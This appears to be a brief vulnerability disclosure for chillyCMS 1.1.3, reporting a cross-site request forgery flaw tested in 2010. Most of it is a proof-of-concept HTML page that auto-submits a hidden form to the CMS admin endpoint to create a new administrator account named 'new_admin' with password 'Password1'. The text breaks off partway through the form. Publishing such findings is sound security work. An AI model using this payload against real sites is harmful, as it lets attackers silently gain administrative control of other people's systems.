Software Vulnerability Tested On Date
chillyCMS 1.1.3 Cross-site Request Forgery Windows Vista + XAMPP 7/5/2010
A vulnerability in chillyCMS 1.1.3 can be exploited to create a new admin.
Proof of Concept
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/chillyCMS/admin/">
            <input type="hidden" name="user" value="new_admin" />
            <input type="hidden" name="name" value="a" />
            <input type="hidden" name="pw" value="Password1" />
            <input type="hidden" name="pw2" value="Password1" />
            <input type="hidden" name="email" value="" />
            <input type="hidden" name="gids%5B%5D" value="1" />
            <input type="hidden" name="gids%5B%5D" value="3" />
            <input type="hidden" name="gids%5B%5D" value="4" />
            <input type="hidden" name="active" value="1" />
            <input type="hidden" name="language" value="en" />
            <input type="hidden" name="getnewsletter" value="1" />
            <input type="hidden" name="myaction" value="new" />
            <input type="hidden" name="action" value="updateuser" />
            <input type="hidden" name="id" value="" />